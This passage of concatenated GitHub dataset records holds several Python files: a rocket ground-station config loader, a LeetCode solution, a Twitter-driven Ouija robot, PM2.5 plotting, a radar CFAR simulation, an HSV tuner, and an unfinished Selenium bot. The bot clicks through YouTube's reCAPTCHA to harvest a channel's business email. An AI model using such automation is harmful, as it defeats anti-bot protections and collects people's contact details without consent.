Hz.\n power: The 15th state has an output power of 14.1dBm for 868MHz and 13.6dBm for 433MHz.\n spread_factor: Higher spreading factor means slower transmissions, but system will have better reception and less\n error.\n coding_rate: The ratio of actual data to error-correcting data.\n bandwidth: The bandwidth allocated to the transmission.\n preamble_len: The length of the transmission used to synchronize the receiver.\n cyclic_redundancy: Enable or disable cyclic redudancy check used to detect errors in the received signal.\n iqi: Invert IQ function enabled/disabled.\n sync_word: The radio sync word.\n \"\"\"\n\n modulation: ModulationModes = ModulationModes.LORA\n frequency: int = 433_050_000\n power: int = 15\n spread_factor: int = 9\n coding_rate: CodingRates = CodingRates.FOUR_SEVENTHS\n bandwidth: int = 500\n preamble_len: int = 6\n cyclic_redundancy: bool = True\n iqi: bool = False\n sync_word: str = \"0x43\"\n\n def __post_init__(self):\n if self.frequency not in range(*LF_RANGE) and self.frequency not in range(*HF_RANGE):\n raise ValueError(\n f\"Frequency '{self.frequency}' not in low frequency range {LF_RANGE} or high frequency range {HF_RANGE}\"\n )\n\n if self.power not in range(*POWER_RANGE):\n raise ValueError(f\"Power '{self.power}' not within allowed range {POWER_RANGE}\")\n\n if self.spread_factor not in VALID_SPREADING_FACTORS:\n raise ValueError(f\"Spread factor '{self.spread_factor}' invalid; must be one of {VALID_SPREADING_FACTORS}\")\n\n if self.preamble_len not in range(*PREAMBLE_RANGE):\n raise ValueError(f\"Preamble length '{self.preamble_len}' not within allowed range of {PREAMBLE_RANGE}\")\n\n if int(self.sync_word, 16) not in range(*SYNC_RANGE):\n raise ValueError(f\"Sync word '{self.sync_word}' not within allowed range of {SYNC_RANGE}\")\n self.sync_word = self.sync_word[2:] # Remove 0x\n\n @classmethod\n def from_json(cls, data: JSON) -> Self:\n \"\"\"Builds a new RadioParameters object from JSON data found in a config file.\"\"\"\n\n # Radio parameters are either initialized with an explicitly defined value from the config file, or\n # are assigned a default value.\n return cls(\n modulation=ModulationModes(data.get(\"modulation\", \"lora\")),\n frequency=data.get(\"frequency\", 433_050_000),\n power=data.get(\"power\", 15),\n spread_factor=data.get(\"spread_factor\", 9),\n coding_rate=CodingRates(data.get(\"coding_rate\", \"4/7\")),\n bandwidth=data.get(\"bandwidth\", 500),\n preamble_len=data.get(\"preamble_len\", 6),\n cyclic_redundancy=data.get(\"cyclic_redundancy\", True),\n iqi=data.get(\"iqi\", False),\n sync_word=data.get(\"sync_word\", \"0x43\"),\n )\n\n def __iter__(self):\n yield \"modulation\", self.modulation.value\n yield \"frequency\", self.frequency\n yield \"power\", self.power\n yield \"spread_factor\", self.spread_factor\n yield \"coding_rate\", self.coding_rate.value\n yield \"bandwidth\", self.bandwidth\n yield \"preamble_len\", self.preamble_len\n yield \"cyclic_redundancy\", self.cyclic_redundancy\n yield \"iqi\", self.iqi\n yield \"sync_word\", self.sync_word\n\n\n@dataclass\nclass Config:\n\n \"\"\"Contains settings for the ground station process.\"\"\"\n\n radio_parameters: RadioParameters = field(default_factory=RadioParameters)\n approved_callsigns: dict[str, str] = field(default_factory=dict)\n\n def __post_init__(self):\n if len(self.approved_callsigns) == 0:\n raise ValueError(\"You must provide at least one approved callsign.\")\n\n @classmethod\n def from_json(cls, data: JSON) -> Self:\n \"\"\"Creates a new Config object from the JSON data contained in the user config file.\"\"\"\n\n return cls(\n radio_parameters=RadioParameters.from_json(data.get(\"radio_params\", dict())), # type:ignore\n approved_callsigns=data.get(\"approved_callsigns\", dict()), # type:ignore\n )\n\n\ndef load_config(filepath: str) -> Config:\n \"\"\"Returns a Config object created from a configuration JSON file.\"\"\"\n\n with open(filepath, \"r\") as file:\n data = json.load(file)\n\n return Config.from_json(data)\n", "repo_name": "CarletonURocketry/ground-station", "sub_path": "modules/misc/config.py", "file_name": "config.py", "file_ext": "py", "file_size_in_byte": 5491, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "31", "api": [{"api_name": "typing.Any", "line_number": 20, "usage_type": "name"}, {"api_name": "enum.StrEnum", "line_number": 23, "usage_type": "name"}, {"api_name": "enum.StrEnum", "line_number": 30, "usage_type": "name"}, {"api_name": "typing.Self", "line_number": 89, "usage_type": "name"}, {"api_name": "dataclasses.dataclass", "line_number": 39, "usage_type": "name"}, {"api_name": "dataclasses.field", "line_number": 125, "usage_type": "call"}, {"api_name": "dataclasses.field", "line_number": 126, "usage_type": "call"}, {"api_name": "typing.Self", "line_number": 133, "usage_type": "name"}, {"api_name": "dataclasses.dataclass", "line_number": 120, "usage_type": "name"}, {"api_name": "json.load", "line_number": 146, "usage_type": "call"}]}
+{"seq_id": "13277964412", "text": "import collections\nimport copy\nclass Solution(object):\n def findSubstring(self, s, words):\n \"\"\"\n :type s: str\n :type words: List[str]\n :rtype: List[int]\n \"\"\"\n if not words: return []\n finW = collections.defaultdict(int)\n cnt = len(words)\n wl = len(words[0])\n for w in words:\n finW[w] += 1\n if len(w) != wl: return []\n res = []\n for i in range(0, wl): # for some case start from s % wl != 0\n k = i\n j = i\n dicW = collections.defaultdict(int)\n count = 0\n while j <= len(s) - wl:\n ss = s[j:j + wl]\n if ss in finW:\n dicW[ss] += 1\n if dicW[ss] <= finW[ss]:\n count += 1\n else: # too many ss, forward k to erase\n while dicW[ss] > finW[ss]:\n # forward k, ning que wu lan\n ss1 = s[k:k + wl]\n dicW[ss1] -= 1\n if dicW[ss1] < finW[ss1]: count -= 1\n k += wl\n if count == cnt:\n # result get\n res.append(k)\n dicW[s[k:k + wl]] -= 1\n count -= 1\n k += wl\n else: # not a word when processing\n dicW = collections.defaultdict(int)\n count = 0\n k = j + wl\n j += wl\n return res\n\nprint(Solution().findSubstring(\"abaababbaba\", [\"ba\",\"ab\",\"ab\"]))\nprint(Solution().findSubstring(\"barfoogfoobarthefoobarman\", [\"bar\",\"foo\",\"the\"]))\nprint(Solution().findSubstring('foobarthebarfooman', ['foo', 'bar']))\nprint(Solution().findSubstring(\"wordgoodgoodgoodbestword\", [\"word\",\"good\",\"best\",\"good\"]))\n# print(Solution().findSubstring(\"lingmindraboofooowingdingbarrwingmonkeypoundcake\", [\"fooo\",\"barr\",\"wing\",\"ding\",\"wing\"]))", "repo_name": "SuperMartinYang/learning_algorithm", "sub_path": "leetcode/hard/Substring_with_Concatenation_of_All_Words.py", "file_name": "Substring_with_Concatenation_of_All_Words.py", "file_ext": "py", "file_size_in_byte": 2055, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "collections.defaultdict", "line_number": 11, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 21, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 43, "usage_type": "call"}]}
+{"seq_id": "32933856372", "text": "#!/usr/bin/env python\n\nimport os\nimport tweepy\nimport Queue\nimport threading\nimport json\nfrom sets import Set\nfrom time import sleep\n\nerr = False\nif not \"TWITTER_CONSUMER_KEY\" in os.environ:\n print(\"Environment variable TWITTER_CONSUMER_KEY not set!\")\n err = True\nelse:\n consumer_key = os.environ.get(\"TWITTER_CONSUMER_KEY\", \"\")\n\nif not \"TWITTER_CONSUMER_SECRET\" in os.environ:\n print(\"Environment variable TWITTER_CONSUMER_SECRET not set!\")\n err = True\nelse:\n consumer_secret = os.environ.get(\"TWITTER_CONSUMER_SECRET\", \"\")\n\nif not \"TWITTER_OAUTH_TOKEN\" in os.environ:\n print(\"Environment variable TWITTER_OAUTH_TOKEN not set!\")\n err = True\nelse:\n oauth_token = os.environ.get(\"TWITTER_OAUTH_TOKEN\", \"\")\n\nif not \"TWITTER_OAUTH_SECRET\" in os.environ:\n print(\"Environment variable TWITTER_OAUTH_SECRET not set!\")\n err = True\nelse:\n oauth_secret = os.environ.get(\"TWITTER_OAUTH_SECRET\", \"\")\n\ntwitter_track = os.environ.get(\"TWITTER_TRACK\")\nif not \"TWITTER_TRACK\" in os.environ:\n print(\"WARNING: Environment variable TWITTER_TRACK not set; nothing will be streamed!\")\nelse:\n print(\"Tracking\", twitter_track)\n\nif not err:\n try:\n auth = tweepy.OAuthHandler(consumer_key, consumer_secret)\n auth.set_access_token(oauth_token, oauth_secret)\n except:\n print(\"Could not set API tokens\")\n err = True\n\nif not err:\n try:\n api = tweepy.API(auth)\n except:\n print(\"Could not authenticate with Twitter\")\n err = True\n\nif err:\n print(\"ERROR: Twitter API communication failed\")\n while True:\n sleep(100)\n\n\nclass RobotListener(tweepy.StreamListener):\n def on_status(self, status):\n # Filter out retweets because we don't get the full text and there's no real\n # point in going and looking up the original just to print it again -- people\n # should say unique things! :)\n if (not status.retweeted) and ('RT @' not in status.text):\n #print(\"FROM: @\" + status.user.screen_name + \" (\" + status.user.name + \")\")\n #print(\"TEXT: \" + status.text)\n q.put(status)\n #print(q.qsize())\n \n def on_error(self, status_code):\n print(\"ERROR! Status code: \", status_code)\n return False\n\ndef robot(letter):\n print(\"ROBOT:\", letter)\n os.system(\"screen -S robot -X stuff '\" + letter + \"^M'\")\n\ndef display_letter(letter):\n #print(\"DISPLAY:\", letter)\n if letter == \"\\n\":\n letter = \" \"\n message = { \"newmessage\": False, \"letter\": letter }\n json.dump(message, fifo)\n fifo.write(\"\\n\")\n fifo.flush()\n\ndef display_new(handle):\n print(\"New tweet from \", handle)\n message = { \"newmessage\": True, \"name\": handle }\n json.dump(message, fifo)\n fifo.write(\"\\n\")\n fifo.flush()\n\ndef twitter_thread():\n print(\"Starting twitter thread\")\n robotListener = RobotListener()\n robot = tweepy.Stream(auth = api.auth, listener = robotListener)\n robot.filter(track=[twitter_track])\n\n\nboard_chars = Set('abcdefghijklmnopqrstuvwxyz0123456789(,@!?:.)')\nq = Queue.Queue()\nfifo = open('messages', 'w')\n\nt = threading.Thread(target=twitter_thread)\nt.daemon = True\nt.start()\n\nwhile True:\n if not q.empty():\n # Grab a tweet and show it\n tweet = q.get()\n display_new(\"@\" + tweet.user.screen_name + \" (\" + tweet.user.name + \")\")\n # We'll show it character by character to allow the robot to move\n for c in tweet.text:\n display_letter(c)\n if Set(c.lower()).issubset(board_chars):\n robot(c.lower())\n sleep(2)\n sleep(5)\n", "repo_name": "mccollam/ouijarobot", "sub_path": "pi/stream.py", "file_name": "stream.py", "file_ext": "py", "file_size_in_byte": 3602, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "os.environ", "line_number": 12, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 16, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 16, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 18, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 22, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 22, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 24, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 28, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 28, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 30, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 34, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 34, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 36, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 36, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 37, "usage_type": "attribute"}, {"api_name": "tweepy.OAuthHandler", "line_number": 44, "usage_type": "call"}, {"api_name": "tweepy.API", "line_number": 52, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 60, "usage_type": "call"}, {"api_name": "tweepy.StreamListener", "line_number": 63, "usage_type": "attribute"}, {"api_name": "os.system", "line_number": 80, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 87, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 94, "usage_type": "call"}, {"api_name": "tweepy.Stream", "line_number": 101, "usage_type": "call"}, {"api_name": "sets.Set", "line_number": 105, "usage_type": "call"}, {"api_name": "Queue.Queue", "line_number": 106, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 109, "usage_type": "call"}, {"api_name": "sets.Set", "line_number": 121, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 123, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 124, "usage_type": "call"}]}
+{"seq_id": "2883772216", "text": "# coding=utf-8\n\nimport pandas as pd\nimport numpy as np\n\nimport sys\nreload(sys)\nsys.setdefaultencoding('utf8')\n\nfrom matplotlib import pyplot as plt\n# from matplotlib import font_manager\n\n# my_font = font_manager.FontProperties(fname=\"/usr/share/fonts/truetype/arphic/uming.ttc\") # /usr/share/fonts/truetype/arphic/ukai.ttc\")\n\nfile_path = \"./BeijingPM20100101_20151231.csv\"\ndf = pd.read_csv(file_path)\nprint(df.head(1))\n\n# 把分开的时间字段合并成pandas时间类型\nperiod = pd.PeriodIndex(year=df[\"year\"],month=df[\"month\"], day=df[\"day\"],hour=df[\"hour\"], freq=\"H\")\n# print(period)\n# print(type(period))\ndf[\"datetime\"] = period\nprint(df.head(5))\n\ndf.set_index(\"datetime\", inplace=True)\ndf = df.resample(\"7D\").mean()\n# 删除缺失数据\n# print(df[\"PM_US Post\"])\ndata = df[\"PM_US Post\"].dropna()\ndata_china = df[\"PM_Dongsi\"]\n\n# 画图\n_x = data.index\n_x = [i.strftime(\"%Y-%m-%d\") for i in _x]\n_x_china = [i.strftime(\"%Y-%m-%d\") for i in data_china.index]\n_y = data.values\n_y_china = data_china.values\n\nplt.figure(figsize=(20, 8), dpi=80)\nplt.plot(range(len(_x)), _y, label=\"US_POST\")\nplt.plot(range(len(_x)), _y_china, label=\"CN_POST\")\nplt.xticks(range(len(_x))[::5], _x[::5], rotation=90)\nplt.legend(loc=\"best\")\nplt.grid(alpha=0.4, linestyle=\":\")\nplt.show()\n\n", "repo_name": "00lab/AI-Lab", "sub_path": "21数据分析/21源码/28_合并时间_PM2.5案例.py", "file_name": "28_合并时间_PM2.5案例.py", "file_ext": "py", "file_size_in_byte": 1269, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "sys.setdefaultencoding", "line_number": 8, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 16, "usage_type": "call"}, {"api_name": "pandas.PeriodIndex", "line_number": 20, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 40, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 40, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 41, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 41, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 42, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 42, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 43, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 43, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 44, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 44, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 45, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 45, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 46, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 46, "usage_type": "name"}]}
+{"seq_id": "10139990732", "text": "import numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\ndef awgn(x,snr):\r\n snr = 10**(snr/10.0)\r\n xpower = np.sum(x**2)\r\n mu = 0\r\n npower = xpower/snr\r\n sigma = np.sqrt(npower)\r\n return np.random.normal(mu,sigma,size=len(x)),sigma\r\n\r\nN = 200\r\ns = np.zeros(N)\r\nsig_db = 35\r\ns[50] = np.sqrt(10**(sig_db/10.0))\r\n[w1,sigma] = awgn(s,5) ####this w is constant if awgn is called only once\r\ns1 = s+w1 \r\ntotal = 10*np.log(np.sum(s1**2)/N)####estimate sigma\r\nprint('noise power(one pulse period) : %ddB'%total)\r\nprint('signal power(one pulse period) ; %ddB'%sig_db)\r\n\r\nw0 = np.zeros((N,10))\r\nfor k in range(10):\r\n [w,sigma] = awgn(s,5)\r\n w0[:,k] = w\r\n\r\ns0 = np.concatenate((s+w0[:,0],s+w0[:,1],s+w0[:,2],s+w0[:,3],s+w0[:,4],s+w0[:,5],s+w0[:,6],s+w0[:,7],s+w0[:,8],s+w0[:,9]))##this just generates the same sequence\r\nsc0 = np.zeros(N)\r\n\r\n\r\nfor j in range(10):\r\n sc0 = sc0 + s0[j*N:(j+1)*N]\r\n\r\nsc = sc0\r\n#sc = s+w ###this for no accumulation\r\nfig1 = plt.figure()\r\nplt.plot(10*np.log10(s1**2),label='one period clutter')\r\nplt.ylabel('Amplitude/dB')\r\nplt.xlabel('range')\r\nfig1.show()\r\n\r\n####cfar####\r\n#sc = sc**2\r\npfa = 1e-4\r\ng = 2\r\nr = 10\r\nn = 2*r\r\nr_cell = np.zeros(n)\r\ntest = np.zeros(N)\r\ntest_ideal = np.zeros(N)\r\nsig_loc = np.zeros(N)\r\nsigma0 = sigma**2\r\n\r\nfor i in range(N):\r\n if i-g-r>=0 and i+g+r<=N-1:\r\n r_cell = np.concatenate((sc[i-g-r:i-g-1],sc[i+g+1:r+i+g]))\r\n \r\n sigma2_e = np.sum(r_cell**2)/n\r\n #print(sigma2_e)\r\n a_temp = pfa**(-1/n)\r\n alpha = n*(a_temp-1)\r\n alpha0 = -np.log(pfa)\r\n #print(alpha)\r\n test_ideal[i] = alpha0*sigma0 ###sigma appears in square not in db,10sigma\r\n test[i] = alpha*sigma2_e\r\n #test[i] = sigma2_e\r\n if test[i]=0 and i+g+r<=N-1:\r\n sig_loc[i]=1\r\n\r\nfig2 = plt.figure()\r\n\r\nplt.plot(10*np.log10(sc**2),'r-',label='signal with white gaussian noise')\r\nplt.ylabel('Amplitude/dB')\r\nplt.xlabel('range')\r\nplt.legend(loc='lower right')\r\nplt.hold(True)\r\n#plt.plot(test,'b-')\r\nplt.plot(10*np.log10(test),'b-.',label='the adaptive threshold')\r\nplt.legend(loc='lower right')\r\nplt.hold(False)\r\nfig2.show()\r\n\r\nfig3 = plt.figure()\r\n\r\nplt.plot(sig_loc,label='the estimate location')\r\nplt.legend(loc='upper right')\r\nplt.xlabel('range')\r\nfig3.show()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n", "repo_name": "jensonlin/SomeRadarDetectProgram", "sub_path": "phaseaccumulate.py", "file_name": "phaseaccumulate.py", "file_ext": "py", "file_size_in_byte": 2292, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 14, "dataset": "github-code", "pt": "31", "api": [{"api_name": "numpy.sum", "line_number": 6, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 9, "usage_type": "call"}, {"api_name": "numpy.random.normal", "line_number": 10, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 10, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 13, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 28, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 36, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 36, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 37, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 37, "usage_type": "name"}, {"api_name": "numpy.log10", "line_number": 37, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 38, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 38, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 39, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 39, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 48, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 49, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 50, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 51, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 56, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 58, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 62, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 70, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 70, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 72, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 72, "usage_type": "name"}, {"api_name": "numpy.log10", "line_number": 72, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 73, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 73, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 74, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 74, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 75, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 75, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.hold", "line_number": 76, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 76, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 78, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 78, "usage_type": "name"}, {"api_name": "numpy.log10", "line_number": 78, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 79, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 79, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.hold", "line_number": 80, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 80, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 83, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 83, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 85, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 85, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 86, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 86, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 87, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 87, "usage_type": "name"}]}
+{"seq_id": "31714013910", "text": "import cv2\nimport numpy as np\n\ncap = cv2.VideoCapture(0)\n\ncv2.namedWindow('configure MinMax HSV')\n\ndef nothing(x):\n pass\n\nerode_dialate_kernel = np.ones((5,5), np.uint8)\nHSV_minmax = ['HMin','SMin','VMin','HMax','SMax','VMax']\nvalue = [179,255,255,179,255,255]\n\nfor string,val in zip(HSV_minmax,value):\n cv2.createTrackbar(string, 'configure MinMax HSV', 0, val,nothing)\n \ncv2.setTrackbarPos('HMax', 'configure MinMax HSV', 179)\ncv2.setTrackbarPos('SMax', 'configure MinMax HSV', 255)\ncv2.setTrackbarPos('VMax', 'configure MinMax HSV', 255)\n\n# Initialize HSV min/max values\nhMin = sMin = vMin = hMax = sMax = vMax = 0\n\n\nwhile True:\n _,frame = cap.read()\n frame = cv2.resize(frame,(650,500))\n blurred = cv2.GaussianBlur(frame, (15,15),0)\n hsv = cv2.cvtColor(blurred,cv2.COLOR_BGR2HSV)\n\n hMin = cv2.getTrackbarPos('HMin', 'configure MinMax HSV')\n sMin = cv2.getTrackbarPos('SMin', 'configure MinMax HSV')\n vMin = cv2.getTrackbarPos('VMin', 'configure MinMax HSV')\n hMax = cv2.getTrackbarPos('HMax', 'configure MinMax HSV')\n sMax = cv2.getTrackbarPos('SMax', 'configure MinMax HSV')\n vMax = cv2.getTrackbarPos('VMax', 'configure MinMax HSV')\n \n lower = np.array([hMin, sMin, vMin])\n upper = np.array([hMax, sMax, vMax])\n \n mask = cv2.inRange(hsv, lower,upper)\n mask = cv2.erode(mask,erode_dialate_kernel,iterations=2)\n mask = cv2.dilate(mask,erode_dialate_kernel,iterations=2)\n\n \n #cv2.imshow(\"main frame\",frame)\n cv2.imshow(\"mask\",mask)\n cv2.imshow(\"blur\",blurred)\n\n if cv2.waitKey(1) & 0xff == ord(\"q\"):\n break\n\n \nprint(lower,upper)\ncap.release()\ncv2.destroyAllWindows()\n", "repo_name": "Thehunk1206/Color-detecting-and-tracking", "sub_path": "get_HSV_for_color.py", "file_name": "get_HSV_for_color.py", "file_ext": "py", "file_size_in_byte": 1655, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "31", "api": [{"api_name": "cv2.VideoCapture", "line_number": 4, "usage_type": "call"}, {"api_name": "cv2.namedWindow", "line_number": 6, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 11, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 11, "usage_type": "attribute"}, {"api_name": "cv2.createTrackbar", "line_number": 16, "usage_type": "call"}, {"api_name": "cv2.setTrackbarPos", "line_number": 18, "usage_type": "call"}, {"api_name": "cv2.setTrackbarPos", "line_number": 19, "usage_type": "call"}, {"api_name": "cv2.setTrackbarPos", "line_number": 20, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 28, "usage_type": "call"}, {"api_name": "cv2.GaussianBlur", "line_number": 29, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 30, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2HSV", "line_number": 30, "usage_type": "attribute"}, {"api_name": "cv2.getTrackbarPos", "line_number": 32, "usage_type": "call"}, {"api_name": "cv2.getTrackbarPos", "line_number": 33, "usage_type": "call"}, {"api_name": "cv2.getTrackbarPos", "line_number": 34, "usage_type": "call"}, {"api_name": "cv2.getTrackbarPos", "line_number": 35, "usage_type": "call"}, {"api_name": "cv2.getTrackbarPos", "line_number": 36, "usage_type": "call"}, {"api_name": "cv2.getTrackbarPos", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 40, "usage_type": "call"}, {"api_name": "cv2.inRange", "line_number": 42, "usage_type": "call"}, {"api_name": "cv2.erode", "line_number": 43, "usage_type": "call"}, {"api_name": "cv2.dilate", "line_number": 44, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 48, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 49, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 51, "usage_type": "call"}, {"api_name": "cv2.destroyAllWindows", "line_number": 57, "usage_type": "call"}]}
+{"seq_id": "12127112389", "text": "from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom threading import Thread, Event\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom time import sleep\n\nimport os\nfrom dotenv import load_dotenv\n\n\nclass Bot(Thread):\n def __init__(self):\n Thread.__init__(self)\n self._stop = Event()\n self.total_request = 100\n self.today_count = 0\n self.page = 1\n self.setdriver()\n \n def stop(self): \n self._stop.set() \n \n def stopped(self): \n return self._stop.isSet()\n\n def init_task_info(self):\n load_dotenv()\n self.DEFAULT_PROFILE = os.getenv('DEFAULT_PROFILE')\n self.channel_link = \"https://www.youtube.com/c/DanLok/about\"\n\n def setdriver(self):\n try:\n self.init_task_info()\n options = webdriver.FirefoxOptions()\n options.add_argument(\"--start-maximized\")\n # options.headless = True\n profile = webdriver.FirefoxProfile(self.DEFAULT_PROFILE)\n self.driver = webdriver.Firefox(executable_path=\"geckodriver.exe\", options=options, firefox_profile=profile)\n \n except Exception as e:\n print(e)\n \n def close(self):\n try:\n self.driver.quit()\n except Exception as e:\n print(e)\n\n def _next_page(self):\n self.page += 1\n self.driver.get(f'{self.SEARCH_LINK}&page={self.page}')\n print('next page : ', self.page)\n\n def _click_button_with_label(self, label):\n try:\n self.driver.find_element(By.XPATH, f'//button/span[text()=\"{label}\"]').click()\n return True\n except Exception as e:\n print(e)\n return False\n\n\n def get_email(self):\n try:\n WebDriverWait(self.driver, 5).until(EC.element_to_be_clickable((By.XPATH, '//tp-yt-paper-button[@id=\"button\"]/*[text()=\"View email address\"]'))).click()\n # view_email_button_ele = self.driver.find_element(By.XPATH, '//tp-yt-paper-button[@id=\"button\"]/*[text()=\"View email address\"]').find_element_by_xpath('..')\n # view_email_button_ele.click()\n print(\"clicked view email button!\")\n WebDriverWait(self.driver, 5).until(EC.frame_to_be_available_and_switch_to_it((By.XPATH,\"//iframe[@title='reCAPTCHA']\")))\n WebDriverWait(self.driver, 5).until(EC.element_to_be_clickable((By.XPATH, '//span[@id=\"recaptcha-anchor\"]'))).click()\n self.driver.switch_to.default_content()\n sleep(2)\n WebDriverWait(self.driver, 5).until(EC.element_to_be_clickable((By.XPATH, '//button[@id=\"submit-btn\"]'))).click()\n email = WebDriverWait(self.driver, 5).until(EC.presence_of_element_located((By.XPATH, '//a[@id=\"email\"]'))).text\n # email = self.driver.find_element_by_xpath('//a[@id=\"email\"]').text\n return email\n except Exception as e:\n print(e)\n return False\n\n def perform_task(self):\n try:\n self.driver.get(self.channel_link)\n business_email = self.get_email()\n print(business_email)\n except Exception as e:\n print(e)\n\n def run(self):\n while True:\n 